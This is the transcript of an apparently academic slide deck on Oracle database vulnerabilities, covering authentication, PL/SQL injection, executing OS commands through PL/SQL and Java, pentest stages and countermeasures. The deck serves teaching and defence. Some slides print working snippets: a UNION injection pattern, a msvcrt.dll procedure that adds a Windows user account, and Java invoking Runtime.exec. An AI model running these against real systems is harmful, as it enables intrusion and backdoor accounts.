information system security l.
Download
Skip this Video
Loading SlideShow in 5 Seconds..
Oracle Vulnerabilities and Security Assessment PowerPoint Presentation
Download Presentation
Oracle Vulnerabilities and Security Assessment

Loading in 2 Seconds...

  share
play fullscreen
1 / 44
deirdra

Oracle Vulnerabilities and Security Assessment - PowerPoint PPT Presentation

332 Views
Download Presentation
Oracle Vulnerabilities and Security Assessment
An Image/Link below is provided (as is) to download presentation

Download Policy: Content on the Website is provided to you AS IS for your information and personal use and may not be sold / licensed / shared on other websites without getting consent from its author. While downloading, if for some reason you are not able to download a presentation, the publisher may have deleted the file from their server.

- - - - - - - - - - - - - - - - - - - - - - - - - - - E N D - - - - - - - - - - - - - - - - - - - - - - - - - - -
Presentation Transcript

  1. Information System Security Oracle Vulnerabilities and Security Assessment

  2. Outline • Oracle Vulnerabilities • Oracle Security Assessment Information System Security - Week 10

  3. Outline • Oracle Vulnerabilities • Oracle Security Assessment Information System Security - Week 10

  4. Ways to attack Information System Security - Week 10

  5. Outline • Oracle Vulnerabilities • Users/Passwords • PL/SQL injection • Running System Commands • Other Vulnerabilities Information System Security - Week 10

  6. Users/Passwords • TNS protocol • How Oracle authenticates users? • Vulnerabilities Information System Security - Week 10

  7. TNS protocol Information System Security - Week 10

  8. TNS protocol (cont) • TNS Listener is the hub of all communications in Oracle. • Information gathering can be done through TNS. Connect Client Listener Accept or Redirect Information System Security - Week 10

  9. TNS protocol (cont) Information System Security - Week 10

  10. Authentication process Client Server Send Username Generates Secret Number Send AUTH_SESSKEY Decrypts AUTH_SESSKEY Encrypts Password Compares with the password hash from database. Send AUTH_PASSWORD Authenticated Information System Security - Week 10

  11. How about Oracle 11g Client Server Send Username Generates Secret Number Decrypts AUTH_SESSKEY Generates own AUTH_SESSKEY Combines 2 AUTH_SESSKEY  Encrypt Password Send AUTH_SESSKEY and AUTH_VFR_DATA Authenticated Compares with the password hash from database. Send AUTH_PASSWORD Information System Security - Week 10

  12. Vulnerabilities • Crypto Aspect • If we have the password (hash)  get clear text password Information System Security - Week 10

  13. Vulnerabilities (cont) • Default Usernames/Passwords. • Files for passwords. • Brute-force. Information System Security - Week 10

  14. PL/SQL Injection • Introduction • Procedures, functions • Triggers • VPD Information System Security - Week 10

  15. Introduction • PL/SQL is the programming language built into Oracle extends SQL. • Can call external library (C or Java). • Used to create procedures, functions, triggers… Information System Security - Week 10

  16. Introduction (cont) • Execution privileges. • Definer privileges: “owner” rights. • Invoker privileges: Keyword: AUTHID CURRENT_USER • PL/SQL can be wrapped  working without source: DESCribe feature. Information System Security - Week 10

  17. Procedures • Similar to SQL injection. • PL/SQL injection can occur with a statement like this: Select * from table_name where id=‘USER_INPUT’ Select * from table_name where id=‘XXX’ UNION SELECT …. Information System Security - Week 10

  18. Procedures (cont) • Inject function to PL/SQL statement. • Keyword: AUTONOMOUS_TRANSACTION • Take advantage of what right functions/procedures are based on. Information System Security - Week 10

  19. Triggers • Similar to procedures/functions injection. • Note: Triggers run with definer right. • Some real-world examples: • MDSYS.SDO_DROP_USER_BEFORE • MDSYS.SDO_GEOM_TRIG_INS1 Information System Security - Week 10

  20. VPD • VPD is based on policy function. • Can be exploited through PL/SQL injection to drop policy. • Or exploited to grant EXEMPT ACCESS POLICY privilege • Another way to defeat VPD is reading raw file  HARD Information System Security - Week 10

  21. Running System Commands • Through PL/SQL • Through Java • Access File System • Access Network Information System Security - Week 10

  22. Through PL/SQL • Use msvcrt.dll library to exec system command. • Must have create library privilege to register library in oracle • Newer versions of Oracle only accept libraries in Oracle_home/bin Information System Security - Week 10

  23. Through PL/SQL (cont) • CREATE OR REPLACE LIBRARY exec_shell AS 'C:\winnt\system32\msvcrt.dll'; • CREATE OR REPLACE PROCEDURE oraexec (cmdstring IN CHAR) • IS EXTERNAL • NAME "system" • LIBRARY exec_shell • LANGUAGE C; • EXEC ORAEXEC('NET USER MYACCOUNT PASSWORD /ADD'); Information System Security - Week 10

  24. Through Java • Don’t need create library privilege. • Require: • Execute on all files. • Write File Descriptor. • Read File Descriptor. Information System Security - Week 10

  25. Through Java (cont) • CREATE OR REPLACE AND RESOLVE JAVA SOURCE NAMED "JAVACMD" AS • import java.lang.*; • import java.io.*; • public class JAVACMD • { • public static void execCommand (String command) throws IOException • { • Runtime.getRuntime().exec(command); • } • }; Information System Security - Week 10

  26. Other ways • Using DBMS Scheduler. • Using Job Scheduler. • Using Alter System statement. Information System Security - Week 10

  27. Access File System • Use UTL_FILE library • Need to have privilege to access DIRECTORY object or create a new one. • Using Java: is similar to running OS command. • Need Read and Write permission Information System Security - Week 10

  28. Access Network • Use UTL_TCP or UTL_HTTP. • Create connection to a remote host  transfer data. Information System Security - Week 10

  29. Other Vulnerabilities • System Configurations • O7_DICTIONARY_ACCESSIBILITY • remote_os_authent • dblink_encrypt_login • .. • TNS protocol settings • Application vulnerabilities Information System Security - Week 10

  30. Other Vulnerabilities • Session attack • http://www.youtube.com/watch?v=jjRrLJEbDQU • Access Control bypass in Login • http://www.securityfocus.com/archive/1/422253 Information System Security - Week 10

  31. Outline • Oracle Vulnerabilities • Oracle Security Assessment Information System Security - Week 10

  32. Oracle Assessment • Vulnerability scanning • Penetration testing Information System Security - Week 10

  33. Vulnerability scanning • Look for evidence of • Vulnerable software versions • Presence or lack of patches • Misconfiguration Information System Security - Week 10

  34. Vulnerability assessment tool • Secure Oracle Auditor™ (SOA) Information System Security - Week 10

  35. Penetration test • A penetration test (pentest) is a method of evaluating the security of a computer system or network by simulating an attack from a malicious source. Information System Security - Week 10

  36. Penetration test • Stages: • Scope/Goal Definition • Information Gathering • Vulnerability Detection • Information Analysis and Planning. • Attack& Penetration/Privilege Escalation. • Result Analysis & Reporting. • Cleanup. Information System Security - Week 10

  37. Information gathering • Footprint • The first and most convenient way that hackers use to gather information. • Includes: internet, remote access,extranet… • Example: whois hvaonline.net Information System Security - Week 10

  38. Information gathering • Example: Information System Security - Week 10

  39. Attack • SQL script Information System Security - Week 10

  40. Vulnerability assessment tool • AppDetectivePro for Oracle • Metasploit Information System Security - Week 10

  41. Database Services Countermeasures • Remove default accounts, assign strong passwords to existing accounts, and begin the audit facility for failed logins. • Keep the databases patched • Reducing the privileges such as PUBLIC, keeping the privileges to a minimum, and auditing access to critical tables and views. Information System Security - Week 10

  42. Summary • Vulnerabilities usually occur based on granting inappropriate privileges. • CREATE ANY PROCEDURE • CREATE ANY TRIGGER • CREATE ANY VIEW • GRANT Something to PUBLIC • … Information System Security - Week 10

  43. References • Oracle Hacker’s HandBook • Database Hacker’s HandBook • http://www.petefinnigan.com/weblog/ • http://soonerorlater.hu/index.khtml?article_id=512 Information System Security - Week 10

  44. Information System Security - Week 10